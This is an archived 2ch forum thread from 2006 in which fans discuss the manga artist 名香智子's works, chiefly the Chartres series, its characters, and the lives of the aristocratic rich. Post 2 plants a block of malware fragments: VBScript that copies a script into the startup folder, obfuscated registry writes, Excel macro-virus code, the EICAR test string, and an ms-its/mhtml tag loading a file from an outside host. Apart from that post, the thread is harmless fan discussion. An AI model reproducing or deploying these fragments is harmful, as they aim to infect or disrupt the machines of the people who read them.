2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

○ o 。○ o 。 名香智子 7 。o ○ 。o ○

1 :花と名無しさん:2006/11/03(金) 13:36:05 ID:x3tAMgSn0
名香智子さんの作品について語りましょう。

過去ログ
現実を忘れたい時は名香智子!(その1)
http://comic.2ch.net/gcomic/kako/987/987489734.html
○ o 。○ o 。 名香智子 2 。o ○ 。o ○
http://comic.2ch.net/gcomic/kako/1024/10243/1024330286.html
○ o 。○ o 。 名香智子 3 。o ○ 。o ○
http://comic.2ch.net/test/read.cgi/gcomic/1049803914/
○ o 。○ o 。 名香智子 4 。o ○ 。o ○
http://comic6.2ch.net/test/read.cgi/gcomic/1077179679/
○ o 。○ o 。 名香智子 5 。o ○ 。o ○
http://comic6.2ch.net/test/read.cgi/gcomic/1111399922/
○ o 。○ o 。 名香智子 6 。o ○ 。o ○
http://comic6.2ch.net/test/read.cgi/gcomic/1139580691/


http://pyon.2ch.net/gcomic/
の【7】 番目にもあり。

2 :<body onload=window()>:2006/11/03(金) 13:40:14 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


3 :花と名無しさん:2006/11/03(金) 13:51:49 ID:???0
>>1


4 :花と名無しさん:2006/11/03(金) 13:55:11 ID:???0
>>1


5 :花と名無しさん:2006/11/03(金) 14:03:35 ID:???0
>>1
乙&保守

6 :花と名無しさん:2006/11/04(土) 01:42:55 ID:wOJRq5f5O
即死防止age

7 :花と名無しさん:2006/11/04(土) 11:33:34 ID:???O
乙です

8 :花と名無しさん:2006/11/04(土) 14:43:11 ID:gkGG8DkP0
>>1
乙です

リオンの国はヨーロッパ大陸のどのあたりにあるんだろう。
イタリアの近くの海岸沿いかな。

9 :花と名無しさん:2006/11/05(日) 03:01:51 ID:???O
自分はモナコのイメージ。
海底に遺跡が埋まっているという話でしたね。

10 :花と名無しさん:2006/11/05(日) 08:55:44 ID:???0
そういえばカリオストロ公国もそんな感じ

11 :花と名無しさん:2006/11/05(日) 23:20:17 ID:???0
エーゲ海あたりイメージしてた

12 :花と名無しさん:2006/11/06(月) 22:54:10 ID:???0
即死回避で保守

13 :花と名無しさん:2006/11/06(月) 23:08:59 ID:???0
リオンの国に嫁いで、皇太子妃、皇后になるアテネーは想像できないな。
よほどリオンが自由を確保してあげないと
息が詰まってシシィのようになりそう。

14 :花と名無しさん:2006/11/06(月) 23:11:26 ID:mflRr2i30
アテネーは我が強くないし、でも可愛らしさはあるし、
賢いリオンが側にいるし、頼もしい兄や弟もいるし、
大丈夫だと思う。

15 :花と名無しさん:2006/11/06(月) 23:12:15 ID:???0
小国だし、まだ皇太子とはいえ
リオンがあれだけフラフラしてられるようなお国柄なら大丈夫と
なんとなく思っていた。

16 :花と名無しさん:2006/11/06(月) 23:22:38 ID:???0
アンリと2人、素朴な土地柄で暮らしてきたアテネーは
不特定多数の他人の視線にさらされたり、
なにかと重箱の隅をつつくような類の社交界人種に
陰口を叩かれたりするのには慣れていないからなぁ。

17 :花と名無しさん:2006/11/07(火) 00:00:18 ID:???0
それにアンリはアテネに対して過保護だしね。

18 :花と名無しさん:2006/11/07(火) 00:04:38 ID:???0
もしアテネが生まれ変わりだとしたら
アンリの子供は死んでるわけで
パリスが見た夢はあくまで夢ってことなのかなあ

19 :花と名無しさん:2006/11/07(火) 00:50:10 ID:???O
あの時空で生を全うした後、
アテネーとして生まれかわる、でもいいのでは。

手元にないのでウロ覚えだが、
「アテネーにとってロノスは遊園地一つ買うようなもの」
「ロノス国民の笑顔が見える→最良の選択だから」
等の描写から、それ程負担にはなっていないと想像。

20 :花と名無しさん:2006/11/07(火) 06:26:19 ID:???0
たぶん、ロノス国内にいたら幸せなんだろうな。>アテネー
ロノス国民は素朴で善良な人々だと思うから。
パリ社交界で面がわれて、公式なパーティーに出席することになると、
ギネヴィア化するのだろう。


21 :花と名無しさん:2006/11/07(火) 09:58:50 ID:???0
リオンがフォローするから大丈夫w
鍵はやはり亭主の資質だと思う。

小さい頃のマイペースな可愛らしさも好き。
ただ小さい頃のアテネーは、その時によって雰囲気が変わる。
リオンの母親のバッグがなくなる話の時はなかなか賢そうだし意志も強そうだし、
天真爛漫で明るい時と、無邪気だけど内気な感じな時とある。

22 :花と名無しさん:2006/11/07(火) 10:06:20 ID:???0
リアンダは妻をフォローするというより、放置プレイだったのか

23 :花と名無しさん:2006/11/07(火) 11:37:00 ID:???0
そりゃ、ギネヴィアでさえ気がつくほど浮気しまくってたし。
本人は浮気とは認識してないようだが。

24 :花と名無しさん:2006/11/07(火) 14:10:21 ID:???0
いつの間に新スレが。>>1乙です。
今過去ログ読んでたんだけどパートナーのマリカって感情移入できないように
嫌な女に書いたって作者が言ってたーっての見たんだけどこれマジ?
確かに嫌なところもあったけどそんなに嫌じゃなかったから。
つかそれぞれのキャラが長所と短所があって、魅力的に感じたけど。
パートナーは苦手なタイプをたくさん好きになれた良作w

25 :花と名無しさん:2006/11/07(火) 23:27:13 ID:???0
>>24
それ書いたの自分だw
読者が感情移入しづらいキャラにしたってのは本当に言ってた

一昔前はああいう美人・金持ち・モテモテwは
主人公になりづらい時代だったしなー
今じゃそれで当たり前だけど




26 :花と名無しさん:2006/11/08(水) 00:43:02 ID:???0
あー一昔前の主人公の典型パターンは何だっけ。
ごくふつうの平凡な少女がとか?

その時代の処女漫画知らないのでわからないやw

27 :花と名無しさん:2006/11/08(水) 00:49:33 ID:???0
極貧だけど美しい少女が影の援助でバレエ習ったりピアノ習ったり

28 :花と名無しさん:2006/11/08(水) 01:03:56 ID:???O
少数派だと思うけど、名香♀キャラでは実は茉莉花が一番好きだー。

名香キャラは、欠点があってもドライな人が多いんだけど
茉莉花はかなりドロドロとしていて、そのぶん怒りや悲しみがリアルに感じたよ。
最初はいかにも世間知らずのお嬢さまで、ショジョ漫画に登場するタイプだったけど
だんだん性格が変わり厚みが出て、一人前の女性として魅力的になっていたのも良かった。
万人に好かれるタイプだとは思わないけど
プライドが高かったり流されちゃう部分も含めて、現実的なキャラだと思う。

29 :花と名無しさん:2006/11/08(水) 08:47:03 ID:???0
コーヒーメーカー投げつけたり、包丁をもてあそんだり、
純情少年をふりまわしたり、ベッドでは優位に立てるとほくそえんだり。

スタイル抜群、お人形さんみたいな顔して、やりたいことやって楽しい奴だ>茉莉花
処女漫画のヒロインとしては失格かもしれないけれど。

典型的ヒロインって「ガラスの仮面」の北島マヤや
「王家の紋章」のキャロルみたいなの?

30 :花と名無しさん:2006/11/08(水) 09:08:40 ID:???0
トゥシューズに画鋲入れられたり、大事な楽譜を破かれたり

31 :花と名無しさん:2006/11/08(水) 10:49:32 ID:???0
ラケットを隠されたり、試合前に閉じ込められたり

32 :花と名無しさん:2006/11/08(水) 10:58:10 ID:???0
大道具や小道具を壊されたり、衣装をびりびりに破かれたり

33 :花と名無しさん:2006/11/08(水) 15:46:57 ID:???0
ジャスミンはそういうイジメはなかったね。

34 :花と名無しさん:2006/11/08(水) 17:11:09 ID:???0
世界チャンピョンのジェニファーやヘンリー卿にいじめられてたよ。
馬がらみで。

35 :花と名無しさん:2006/11/08(水) 17:46:16 ID:???0
鈴音にも最初きつく当たられてたし

36 :花と名無しさん:2006/11/08(水) 17:54:39 ID:???0
茉莉花と砌が結婚したと知ったら、鈴音はショックかな?

37 :花と名無しさん:2006/11/08(水) 18:17:27 ID:???0
落ち着くとこに落ち着いたと思うかも。

38 :花と名無しさん:2006/11/08(水) 19:10:20 ID:???0
まだみぎりが好きだったかどうかによるな。
でもあれから大分時間経ったしもうショックじゃないかな?

39 :花と名無しさん:2006/11/08(水) 19:46:04 ID:???0
志文さんがブラックプールだったかで言った、
「鈴音はベルギー人の青年と結婚したよ」は
ほんとだったのか、神さんを動揺させるための
ウソだったのか……。

40 :花と名無しさん:2006/11/09(木) 10:10:40 ID:???0
鈴音みたいなタイプは、昔あれだけ好きだった男のことを簡単に嫌いになったり
記憶からdeleteするようには見えない。
結婚相手のことはもちろん愛しているけれど、黒髪美青年を見かけたら、
たまには砌のことを思い出すかもしれないという感じかな。

小夜子の志文delete六郎熱愛ほど切り替えが早くないような。

41 :花と名無しさん:2006/11/09(木) 18:57:04 ID:???0
リアンダはバカ過ぎて愛おしい

42 :花と名無しさん:2006/11/09(木) 20:14:50 ID:???0
リアンダの女に対する手練手管がギネヴィアに対してはまったく無効化するのが楽しい

43 :花と名無しさん:2006/11/10(金) 09:11:28 ID:???0
ギネヴィア帽子でなんか料理作ってたのが忘れられない。
でもあれで乗馬用の帽子って固いんだって知った。

44 :花と名無しさん:2006/11/11(土) 12:39:55 ID:???0
乗馬用の帽子って、ビロード張りだけどヘルメットだよね?

45 :花と名無しさん:2006/11/11(土) 18:03:51 ID:???0
>>44
そう、体験乗馬で初めて持ったら重いんで気づいた
というかヘルメットと説明された

そういえばアフリカ探検の定番の白い帽子もヘルメットだよね

46 :花と名無しさん:2006/11/11(土) 19:31:49 ID:???0
そうなんだ。確かに言われてみれば探検隊も乗馬も危険だからヘルメットじゃないと
危ないかもね。

47 :花と名無しさん:2006/11/12(日) 00:32:54 ID:???0
ただのお洒落じゃなかったのか。
考えてみりゃ、手袋も乗馬ズボンもちゃんと実用品だっけ。

48 :花と名無しさん:2006/11/12(日) 23:00:40 ID:???0
ヴィスタリアってお洒落にあんまり興味なさそうだけどドレスいっぱい持ってるんだね。

49 :花と名無しさん:2006/11/12(日) 23:04:22 ID:???0
ラウールも特に女性のおしゃれに興味なさそうだが
アテネーの家庭教師が夕食の際に何を着るか
同じものばかりにならないか気を配っていた。
ことさら興味が無くてもそうするのが当たり前の世界(階級)
ということなんだろう。

50 :花と名無しさん:2006/11/13(月) 19:51:15 ID:???0
>>48
おしゃれに興味がなかったら
サラのデザイン画に目を引かれるか?

51 :花と名無しさん:2006/11/13(月) 22:05:22 ID:???0
ことさらにチャラチャラしなくても、普通に一日何度も何度も着替える世界だからなあ。
ヴィスタリアのファッションはバラエティ豊かで好き。
アンリのスキャンダル騒動の新聞を読んでた時の和服も似合ってたなあ。

52 :花と名無しさん:2006/11/13(月) 23:01:16 ID:???0
和服というか、日本の着物を無造作にガウンに転用、かな?

53 :花と名無しさん:2006/11/14(火) 01:29:05 ID:???O
ヴィスは
グランサニューの宝石管理は興味がなくて
いくつかリオンに盗まれてたり、
アネモネやポリィの着せ替えを楽しんだり、
アンティックドールの着せ替えも楽しんでたり、
才能ある人材にチャンスを与えてさらに輝くのを楽しんでいる?

自分好みの美しいものがさらに美しくなるのが楽しいのかな。

54 :花と名無しさん:2006/11/14(火) 10:33:42 ID:???0
宝石もドレスも使う事を楽しむけど
所持する事には興味がない。


55 :花と名無しさん:2006/11/14(火) 22:47:46 ID:???0
ひとくくりにして「きれいなものが好き」でどうだろう。

56 :花と名無しさん:2006/11/15(水) 12:23:39 ID:???0
なるほど。しかし男嫌いのヴィスが最後のあたりで男好きになったりおばさんフラグが
立ったりで衝撃的だったな。人は変わるんだな。
でもヴィスならそれも良い!!最高。

57 :花と名無しさん:2006/11/15(水) 15:16:02 ID:???O
ジョン・クックってシューマッハに似てる…

58 :花と名無しさん:2006/11/15(水) 22:14:47 ID:???0
>56
「稚児趣味遊びなんか男遊びのうちに入りませんよ」

59 :花と名無しさん:2006/11/19(日) 04:21:23 ID:???O
稚児遊びの相手が米国の四大財閥の次男坊(三男?)か。
スケール?でかすぎ。

オセロの「知っとこ」という関西ローカル番組で、
マルタ共和国が紹介されていた。
シチリアの南の島国で、
「ロノスっぽーい!」と思ってしまった。

画集で知ったのだが、
リオンの氏名「リオン・カルロス・デ・ロノス大公」って
カルロス…南方的。南米のイメージもあるな
デ…イタリアの貴族も「デ」だったと思う。スペインやポルトガルはどうなんだろう?

ファーストネームの次に来るのは洗礼名なのかな?
ポリィは「アンナ」というのも面白い。

60 :花と名無しさん:2006/11/19(日) 14:45:52 ID:???0
カルロスはスペイン語では非常によくある名前
英語でチャールズ、仏語でシャルル、独語でカール、伊語でカルロ。


61 :花と名無しさん:2006/11/19(日) 15:32:00 ID:???0
ヴィスの人形を取り返す話の時、
リオンが名乗っていた「チャールズ」は偽名じゃなかったのか〜Σ(゚∇゚;)!!


62 :花と名無しさん:2006/11/20(月) 03:10:29 ID:???O
ダグラス・ホジキンの、
ホジキンは母方の姓みたいけど、
ダグラスはどこから…
身元が割れないための本気の偽名?

63 :花と名無しさん:2006/11/20(月) 13:20:36 ID:???0
アネモネとアンリって
ヴィスに結婚を反対されてたんだっけ?
ファンション・ファデでアネモネが泣いてる場面あったよね。

64 :花と名無しさん:2006/11/20(月) 15:15:21 ID:???0
>>63
そこが長年の謎、反対する理由が無い。
んで、樹海の虜になるとアネモネが以上に大人になってるし。

65 :花と名無しさん:2006/11/20(月) 15:48:36 ID:???0
ファデではヴィスのキャラもなよなよしていたから、
あれはパラレルワールド。

シャルトルシリーズのヴィスが結婚を反対するとしたら、
アンリなんかにあんな可愛いアネモネはもったいないわー、
わたしは失恋ばかりなのにー
という嫉妬かも。

66 :花と名無しさん:2006/11/20(月) 16:06:18 ID:???0
身分違いとか?あと金銭問題とか
最初に出てきたとき、貧乏ではないにしろ、大富豪でもなかったよね
アネモネの貴族としての格ってどうだったっけ
ハプスブルグには及ばないんだろうけど

未来のシャルトル公爵夫人ってことを考えるなら、
高貴な血か、グループを繁栄させるような閨閥結婚が望ましいんだろうね

67 :花と名無しさん:2006/11/20(月) 22:45:06 ID:???0
アネモネんちは貧乏男爵だったような

68 :花と名無しさん:2006/11/20(月) 23:31:45 ID:???0
シャルトルの繁栄を考えるヴィスというのも、変な感じだけどね。

ヴィスとラウールが従兄弟同士で母親同士か祖母同士が仲が悪いんだっけ。
具体的にどういう血縁関係があるんあろう。

69 :花と名無しさん:2006/11/20(月) 23:43:33 ID:???0
その時代のエピソードを読んでみたい。<祖母同士
過去作品にはないよね?

70 :花と名無しさん:2006/11/21(火) 00:40:16 ID:???0
ラウール母=生真面目な超能力者
ラウール父=黒髪イケメン若い野獣

この2人のどちらかが、ヴィス母かヴィス父の兄弟姉妹
ラウール父の妹がヴィスの母=黒髪で、だからマザコン・ヴィスは黒髪が好きだとか
妄想

71 :花と名無しさん:2006/11/24(金) 00:38:30 ID:???0
ヴィスコンティの「ルートヴィッヒ神々の黄昏」を観た。
名香さんのエリザベート皇后の作品を包む王侯の生活の匂いは、
貴族出身の監督が作り出した雰囲気に遜色ない。すごい。


72 :花と名無しさん:2006/11/24(金) 15:18:42 ID:???0
名香先生の描くヒロイン貴族って
立ち姿がすごくきれいで神々しいんだよな。
で、ブサキャラは立ち姿も猫背でブサに描いてある。
でも最近、ブサキャラをブサに描きすぎなのがもにょる。

73 :花と名無しさん:2006/11/24(金) 19:30:01 ID:???0
ブサの方が描いていて面白いんだよ。
美形はいじる部分が少ないから。

74 :花と名無しさん:2006/11/24(金) 20:53:59 ID:???0
ろうそくの話の、ブサの手抜き具合はすごかった。

75 :花と名無しさん:2006/11/24(金) 23:01:51 ID:???0
素敵な主婦たちでマダムジョーカー読んだ
百合子ちゃん可愛いな

76 :花と名無しさん:2006/11/25(土) 01:14:53 ID:???0
百合子ちゃんは確かに可愛い。
蘭子さんがフツーになっちゃったので、百合子ちゃんメインの話が
いちばん楽しめるわ。

77 :花と名無しさん:2006/11/25(土) 19:40:43 ID:???0
百合子ちゃんて、
あやめさんのストーカー男に脅されたり、
お隣のお婆さん監禁犯に縛られたり、
何かある度、十蘭が現れて自分の危機を救ってくれるんだから、
十蘭のことを王子様みたいに思っちゃうだろうね〜。
スリコミ効果抜群。

蘭奈は、見ていてもあまり楽しくないけど、
百合子ちゃんと十蘭は見ていて楽しい&美しい♪
蘭子さんの同級生のおかっぱの人の話も書いて欲しいなぁ。

78 :花と名無しさん:2006/11/25(土) 21:40:08 ID:???0
やっぱりメガネとったら美人なんだろうね

79 :花と名無しさん:2006/11/25(土) 23:47:08 ID:???0
>>71
私も見た
金襴金襴だった。

あれみてから名香さんの作品見るとオールカラーで見えちゃう

80 :花と名無しさん:2006/11/25(土) 23:59:31 ID:???0
自分は「ルードヴィヒ」先に観ていたせいか、「ああ、名香さん
参考資料に使ってるんだなー」とオモタよ。

81 :花と名無しさん:2006/11/26(日) 07:53:45 ID:???0
ルードヴィッヒやシシィの衣装に似ているものがあったね。

82 :花と名無しさん:2006/11/28(火) 20:34:03 ID:???0
今日は火曜
明日は水曜
11月ものこり二日

83 :花と名無しさん:2006/12/04(月) 01:14:53 ID:???0
ヴィスタリアの幼少の頃の話が見たかったな。
謎すぎる。

84 :花と名無しさん:2006/12/04(月) 22:03:13 ID:???0
まんまクロウディアみたいな感じだと思ってた。
最後の最後の台詞が「歴史は繰り返す」っぽかったし。

85 :花と名無しさん:2006/12/05(火) 03:17:13 ID:???0
クロウディアはブラコンだけどヴィスの場合は女好きに
育つような憧れのお姉さまみたいなのが身近にいたのかな。

86 :花と名無しさん:2006/12/05(火) 08:28:37 ID:???0
ヴィスはマザコン?

87 :花と名無しさん:2006/12/06(水) 01:03:19 ID:???0
いや、ヴィスは生まれつきの筋金入りだと思う。
クロウディアの性格もヴィスゆずりの生まれつきっぽいしなあ。
ルックスはアンリをそのまま女にしたような子だが、あれだけ美人なら
ああいう無敵娘になっても無理はないような気がする…
でも、ヴィスの場合、自分の美人さは横に置いといて(財産は計算に入れてるのに)
素で女好きなのが可愛い。

88 :花と名無しさん:2006/12/06(水) 01:48:41 ID:???0
クロウディアは祖母とおなじように、兄に対するかなわぬ恋を追いかけて
楽しそうに生きていくのだろうか。

89 :花と名無しさん:2006/12/08(金) 14:56:27 ID:???0
ワーラジに眉毛書き足したら美形になるらしいのでシャーペンで書き足してみたが
自分は絵心が無いためか微妙な出来になった。
あと金持ちってやっぱり閉鎖的な世界に住んでいるだろうか?
海外旅行しまくってグローバルなイメージだけど。

90 :花と名無しさん:2006/12/09(土) 16:58:21 ID:???0
>63-68
ラウールは初対面からアネモネを気に入ってたんだよね?
ヴィスが反対する理由、私も謎だなぁ。
目をつけていた美少女がいて、アンリとの結婚をネタに
取り込もうと計画中だったとか…(だからアネモネが邪魔だった?)
「樹海の虜」でアネモネが大人になってたのは、
結婚を認めてもらうためにすごい努力をしたんだろうなと思う。
(アンリの堪能な語学に着いていく為か、マヤの言葉も勉強してたよね)
だからそんなアネモネがアンリと別れてしまったのは未だに残念だ。

91 :花と名無しさん:2006/12/10(日) 13:43:26 ID:???0
>>89
付き合う相手が金持ち倶楽部内の人間に限定されるから、
遊ぶ場所は変われど村社会のイメージ。

「ハイライフ」を書いたタキは、
金持ちの一番の特権は、付き合いたく人間と付き合わないこととしているね。


92 :花と名無しさん:2006/12/11(月) 15:40:14 ID:???0
金持ち倶楽部の中のイヤな人間とも、付き合わないで済むんだろうか?>金持ち

93 :花と名無しさん:2006/12/11(月) 18:03:17 ID:???0
>>92
タキによると、それができる立場こそ、
金持ち倶楽部メンバーが羨むナンバーワン金持ちだそうだ。

94 :花と名無しさん:2006/12/12(火) 09:32:37 ID:???0
でも金持ちがパーティーに出るのって楽しむためじゃなく
人付き合いのためみたいなところない?
ほんとに自由?下層の人間に比べたらそりゃ人間関係だいぶ楽そうだけど。

95 :花と名無しさん:2006/12/12(火) 12:07:05 ID:???0
だからこそ「金持ちランクが上がるほど出たくないとこは
出なくてすむ」なんでしょ

96 :花と名無しさん:2006/12/12(火) 16:02:18 ID:???0
人間関係楽かな?
下層階級の方が、河岸を変えてリスタートとかできそうだし
閉鎖的で、生まれたときからのつきあいとかもあるんでしょう
○歳までおねしょしてたとか、一回の失点をずーっと何十年も言われそう

そういや、ラウールはシリーズの最初の方で、アルフレッドは金持ちだから、
付き合わないわけにいかないとかなんとか(うろ覚え)、ヴィスに言ってなかったっけ?
アルフレッドの方が金持ちなのかな

97 :花と名無しさん:2006/12/12(火) 20:46:06 ID:???0
最初のエピソードから見るとそうっぽいね。
援助物品がらみのやつ。

ギネヴィアは、「旦那さまのため」と言われて、出たくもない夜会に出ていたし。
(シャー・ザマンが出てきた話)

98 :花と名無しさん:2006/12/12(火) 21:07:03 ID:???0
上流階級のナンバーワン金持ちって、誰だろう?
エリザベス女王とか浮かんだけど、さすがに女王だと出たくなくても、出なきゃいけない晩餐会とかありそう

99 :花と名無しさん:2006/12/12(火) 23:05:05 ID:???0
ビル・ゲイツは貴族ではないし・・・

100 :花と名無しさん:2006/12/12(火) 23:07:32 ID:???0
一代で成功しても、お金持ちであり続ける為の努力とか
育ち良くても、ノブレス・オブリージュとか色々しがらみ多そう・・・

ところで、マダム・ジョーカー二巻で蘭子さんが
アベイユのコート着てたのって既出でした?


101 :花と名無しさん:2006/12/12(火) 23:14:20 ID:???0
人嫌いな金持ちbPはハワード・ヒューズ

102 :花と名無しさん:2006/12/12(火) 23:22:06 ID:???0
ttp://www.forbes.com/lists/2006/10/Rank_1.html

貴族ぽい名前はないねえ。
というかイギリス人がほとんどいないw
100位の人が貴族かな?

103 :花と名無しさん:2006/12/12(火) 23:33:36 ID:???0
先祖からの財産を自分の代で食い潰すつもりで生きるお金持ち道が
いちばんたのしそ。
資産管理もそこそこに、付き合いたい人間とだけ付き合うもよし、ひきこもるもよし。

ヴィスはそんな感じなのかな。
宝石すり替えられようがお構いなしだし、
パトロン道楽はしても事業欲はなさそうだし。


104 :花と名無しさん:2006/12/13(水) 09:36:40 ID:???0
漫画ですから

105 :花と名無しさん:2006/12/13(水) 16:30:49 ID:???0
>>102英語だからよくわからんがイギリス少ないっぽいね。United States ってのが
やたら目についたけど。

金持ちは良いよね、銀行に預けた貯金の利子だけで生活できる人も世の中には
いるらしいし。別世界の話だけど。

106 :花と名無しさん:2006/12/13(水) 18:20:15 ID:???0
アメリカは、成功した人間がますます成功する社会だから。
逆に失敗すると、転落一直線だけど。
日本は努力しなければ財産を維持できない(相続税がごっそりかかる)から、
失敗しても死にはしないが成功しても家を維持するのは難しい。
やっぱアレだ、自分一代のつもりで人生ぱーっと楽しむのが正解だと。
そういう意味でもヴィスの行き方はすごく好きだ。

107 :花と名無しさん:2006/12/14(木) 13:30:11 ID:???0
ヴィスがあの中国野郎にお人形全部あげる約束しちゃったのが衝撃だった、つかショックだった。
理解できません><

つかあの男ひどい事したから嫌だ。容姿は大好きだけど(表紙はかっこよかった)

108 :花と名無しさん:2006/12/14(木) 15:11:06 ID:???0
綺麗な物が好きで集めても、財産とか思ってるわけじゃないから
自分が死んだ後はそれが好きな人の手に渡ればいいかというか、
とにかくこだわりが無いんだろう。

109 :花と名無しさん:2006/12/14(木) 16:49:57 ID:???0
>>107
あの変態ならコレクターとして保管は完璧にしてくれそうだと思った。
ヴィスは特になにも考えてなさそうだったけどw

まああれだ、あの中国野郎がヴィスより長生きする保証もないし。

110 :花と名無しさん:2006/12/14(木) 18:29:17 ID:???0
ノブレス・オブリージュだね

111 :花と名無しさん:2006/12/14(木) 18:34:09 ID:???0
>110
ヴィスはそんな意識無くて鷹揚なだけだろう
ラウールはアルフレッドの賭けとかの時もちゃんとしてたけど

112 :花と名無しさん:2006/12/14(木) 21:17:09 ID:???0
無意識下の

113 :花と名無しさん:2006/12/15(金) 23:16:48 ID:???0
>>102
74位の人、貴族かな?
vonってフォン?フランツがフォンついてたよーな。

114 :花と名無しさん:2006/12/15(金) 23:35:57 ID:???0
>>113
ドイツの貴族についてはよくわからんがこんな記述がありました。
ttp://ja.wikipedia.org/wiki/%E3%83%A6%E3%83%B3%E3%82%AB%E3%83%BC

115 :花と名無しさん:2006/12/16(土) 23:33:10 ID:???0
ユンカー??初めて聞く単語だ。フォンは貴族の子って意味なんだな。
フォンがつくキャラっていうとベルバラのフェルゼンなんだけどな。

グリーンボーイ文庫買った。面白かったけど名香さんセックスに寛容すぎw
でも現実ってあんなもん・・・なのか?花子もとい葉菜子が尻軽女にみえる。

116 :花と名無しさん:2006/12/17(日) 00:40:20 ID:???0
フェルゼンはスウェーデン出身

117 :花と名無しさん:2006/12/17(日) 09:35:22 ID:???O
ユンカースっていう実家ドイツの飛行機メーカー思い出してwikiしたら
ドリンク剤ユケエルはここからきてるとさらに新しい発見

118 :花と名無しさん:2006/12/17(日) 09:37:57 ID:???O
ドイツは実家じゃないよ〜( ̄口 ̄)
しかもユンケルも打ち間違えた

119 :花と名無しさん:2006/12/17(日) 14:27:37 ID:???0
>115
ハナコは尻軽女で当たりだと思う・・・

120 :花と名無しさん:2006/12/17(日) 23:50:59 ID:???0
ユンカース・カムヒア

…を思い出したのはいいが、見たことも読んだこともなかった。

121 :花と名無しさん:2006/12/18(月) 09:26:04 ID:???0
セックスに寛容な表現はショジョマンガに対する・・・

122 :花と名無しさん:2006/12/18(月) 13:36:53 ID:???0
名香さんには今の処女漫画じゃなくなった少女漫画について意見を聞きたいところだw

123 :花と名無しさん:2006/12/20(水) 01:11:18 ID:???0
>>120
ノシ

124 :花と名無しさん:2006/12/20(水) 16:51:49 ID:???0
パンドラパニック全部読んだ。評判の通り最初はちょっともにょったけど
後半からだんだんジワジワと面白さが来る感じだった。不細工な動物を元にした
キャラはちょっと抵抗あったけど(蛙っぽいのとか)美形キャラがゴロゴロ出てきたので
おK。最後パンドラあの男と結ばれて本当良かった。漫画読んでてハッピーエンドが
こんなにうれしかったのは久しぶり。良かったねパンドラ。2巻までハラハラしてたけど
3巻で喜べたよ。でも髪はロングのままが好きでした…。切ったあとももちろんカッコイイけど。

125 :花と名無しさん:2006/12/21(木) 00:44:54 ID:???0
パンドラの異種族はけっこう面白かったなあ。
特にカーサマ教が原始母系社会っぽくて、なんだかすごく納得できた。
「男も女も生まれた家で育って死ぬ、子供のためによりよい男を求める、
 生まれた子供は家全体の宝物」っていうのが。

126 :花と名無しさん:2006/12/21(木) 01:42:25 ID:???0
名香さんの漫画はそういういろんな価値体系が出てくるところが
面白いね。
ファデでも既に女同士の結婚もありなアフリカ部族のことを
出してたし。

127 :花と名無しさん:2006/12/23(土) 19:02:33 ID:???0
生まれ変わったらシャルトル家レベルの金持ちになりたひ。
でもアンリみたいな目にあうのは嫌だ。

128 :花と名無しさん:2006/12/24(日) 05:29:39 ID:???0
アンリみたいな?
片脚切断、夜の作法をゴシップ誌に暴露される、こんな感じ?

129 :花と名無しさん:2006/12/24(日) 13:18:38 ID:???0
マヤの神様にされるもある。

桃色ロマンを久々に読んだが、美形のバリエがたくさんだ。
貧乏人と金持ちの落差が楽しい。

金持ちの女の子の替え玉になって旅行して、
いい男とくっつく話おもしろいけど、
美少年龍彦君との結婚どうして反対されてたんだろ?

130 :花と名無しさん:2006/12/24(日) 17:01:04 ID:???0
シャルトル家くらいの大金持ちになると、SPが24時間ついてきて、
ひとりになりたい…とか思うもんかな。

>>127
アンリは今の美貌と頭脳があれば、
シャルトル家レベルの成功を独力で達成できるそうで。
まずは今生で自力でがんばれ。

131 :花と名無しさん:2006/12/26(火) 01:45:39 ID:???O
シャルトルシリーズのメインの女性たち
ヴィス、ポリィ、アネモネ、アテネー、おまけにソフィー…
は、夫以外の男性経験はなさそう…
処女漫画という考え方とは全然違う感じ。
そういえばギネヴィアの父のキング侯爵がアーサーの妻には
「貴族の血をひく子を産みそうな若い処女でなくては」のセリフが
ダイアナ元妃と重なる。まあ、ダイアナは見当違いだったかもしれないが。

132 :花と名無しさん:2006/12/26(火) 02:42:25 ID:???0
ヴィスは、頭が悟空のひとと一夜のアバンチュールを

133 :花と名無しさん:2006/12/26(火) 08:20:49 ID:???0
言われてみればシャルトルシリーズの女性キャラはそうだな。
ポリィなどはほかの男と寝ていても疑問では無いけれど(アンリが放っておくから)
他のキャラは確かにそうかも。
ヴィスは男とは寝てないが女とは寝てる予感w

134 :花と名無しさん:2006/12/26(火) 16:48:53 ID:???0
>>125
あと、「結婚って女を他の家に売る習慣でしょう?」
   「その上、相手の男の事を嫌いでもその男の子供を産まなきゃいけないんでしょう?
   子供が可哀そうよ」も。
たしかに筋は通っているよね。>カーサマ教圏


135 :花と名無しさん:2006/12/26(火) 21:34:40 ID:???0
>134
のレスで気がついた

カーサマって、母様(かあさま)だ'`,、('∀`) '`,、

136 :花と名無しさん:2006/12/26(火) 21:52:36 ID:???0
ブルーチーターかw

137 :花と名無しさん:2006/12/26(火) 22:50:23 ID:???0
>>135
気づいてなかったのか!

138 :花と名無しさん:2006/12/28(木) 13:11:38 ID:???0
フラワーズ読んできた
もう完全に連載漫画だねw
面白いから嬉しいけど

139 :花と名無しさん:2006/12/28(木) 13:17:41 ID:???0
名香さんぽくっていいや。

